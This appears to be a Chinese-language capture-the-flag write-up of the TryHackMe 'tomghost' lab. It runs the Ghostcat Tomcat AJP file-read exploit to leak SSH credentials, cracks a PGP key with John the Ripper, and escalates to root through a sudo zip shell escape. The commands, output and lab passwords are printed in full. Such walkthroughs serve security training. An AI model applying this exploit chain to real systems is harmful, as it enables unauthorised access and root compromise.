基本信息
| 🚀 | 本地机器信息 | 目标机器信息 |
|---|---|---|
| IP | 10.17.5.121 | 10.10.211.222 |
| OS | Kali | Linux ubuntu |
信息搜集
端口扫描
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 60
53/tcp open domain syn-ack ttl 60
8009/tcp open ajp13 syn-ack ttl 60
8080/tcp open http-proxy syn-ack ttl 60
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.71 seconds
Raw packets sent: 8 (328B) | Rcvd: 5 (216B)
进一步进行版本探测
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 60 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
53/tcp open tcpwrapped syn-ack ttl 60
8009/tcp open ajp13 syn-ack ttl 60 Apache Jserv (Protocol v1.3)
8080/tcp open http syn-ack ttl 60 Apache Tomcat 9.0.30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
路径枚举
漏洞利用
搜索
apache jserv protocol v1.3 exploit
git clone https://github.com/leonooo13/CNVD-2020-10487-Tomcat-Ajp-lfi.git└─$ python CNVD-2020-10487-Tomcat-Ajp-lfi.py -h
usage: CNVD-2020-10487-Tomcat-Ajp-lfi.py [-h] [-p PORT] [-f FILE] target
positional arguments:
target Hostname or IP to attack
options:
-h, --help show this help message and exit
-p PORT, --port PORT AJP port to attack (default is 8009)
-f FILE, --file FILE file path :(WEB-INF/web.xml)python CNVD-2020-10487-Tomcat-Ajp-lfi.py 10.10.211.222
-----------------------------------
目标: 10.10.211.222 端口: 8009 文件:WEB-INF/web.xml
-----------------------------------
Getting resource at ajp13://10.10.211.222:8009/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0"
metadata-complete="true">
<display-name>Welcome to Tomcat</display-name>
<description>
Welcome to GhostCat
skyfuck:8730281lkjlkjdqlksalks
</description>
</web-app>
webshell
usershell
ssh登录
skyfuck:8730281lkjlkjdqlksalks skyfuck@ubuntu:~$ ls -la
total 40
drwxr-xr-x 3 skyfuck skyfuck 4096 Nov 16 00:44 .
drwxr-xr-x 4 root root 4096 Mar 10 2020 ..
-rw------- 1 skyfuck skyfuck 136 Mar 10 2020 .bash_history
-rw-r--r-- 1 skyfuck skyfuck 220 Mar 10 2020 .bash_logout
-rw-r--r-- 1 skyfuck skyfuck 3771 Mar 10 2020 .bashrc
drwx------ 2 skyfuck skyfuck 4096 Nov 16 00:44 .cache
-rw-rw-r-- 1 skyfuck skyfuck 394 Mar 10 2020 credential.pgp
-rw-r--r-- 1 skyfuck skyfuck 655 Mar 10 2020 .profile
-rw-rw-r-- 1 skyfuck skyfuck 5144 Mar 10 2020 tryhackme.asc
┌──(kali㉿kali)-[~/Documents/thm/tomghost]
└─$ gpg2john tryhackme.asc > hash.txt
File tryhackme.asc┌──(kali㉿kali)-[~/Documents/thm/tomghost]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
alexandru (tryhackme)
1g 0:00:00:00 DONE (2024-11-16 03:55) 25.00g/s 26800p/s 26800c/s 26800C/s theresa..alexandru
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
导入pgp秘钥文件,期间输入上面的密码
└─$ gpg --import tryhackme.asc
gpg: 钥匙箱‘/home/kali/.gnupg/pubring.kbx’已创建
gpg: /home/kali/.gnupg/trustdb.gpg:建立了信任度数据库
gpg: 密钥 8F3DA3DEC6707170:公钥 “tryhackme <stuxnet@tryhackme.com>” 已导入
gpg: 密钥 8F3DA3DEC6707170:私钥已导入
gpg: 密钥 8F3DA3DEC6707170:“tryhackme <stuxnet@tryhackme.com>” 未改变
gpg: 处理的总数:2
gpg: 已导入:1
gpg: 未改变:1
gpg: 读取的私钥:1
gpg: 导入的私钥:1gpg解密credential.pgp文件,期间再次输入上面的密码
┌──(kali㉿kali)-[~/Documents/thm/tomghost]
└─$ gpg credential.pgp
gpg: 警告:没有提供命令。正在尝试猜测您的意图...
gpg: 注意:接收者的偏好设置中找不到密文算法 CAST5
gpg: 由 1024 位的 ELG 密钥加密,标识为 61E104A66184FBCC,生成于 2020-03-11
“tryhackme <stuxnet@tryhackme.com>”└─$ cat credential
merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j
┌──(kali㉿kali)-[~/Documents/thm/tomghost]
└─$ ssh merlin@10.10.211.222
merlin@10.10.211.222's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-174-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Last login: Tue Mar 10 22:56:49 2020 from 192.168.85.1
merlin@ubuntu:~$ id
uid=1000(merlin) gid=1000(merlin) groups=1000(merlin),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare)
merlin@ubuntu:~$ sudo -l
Matching Defaults entries for merlin on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User merlin may run the following commands on ubuntu:
(root : root) NOPASSWD: /usr/bin/zip
rootshell
gobins 提权
merlin@ubuntu:~$ TF=$(mktemp -u)
merlin@ubuntu:~$ sudo zip $TF /etc/hosts -T -TT 'sh #'
adding: etc/hosts (deflated 31%)
# id
uid=0(root) gid=0(root) groups=0(root)痕迹清理
rm $TF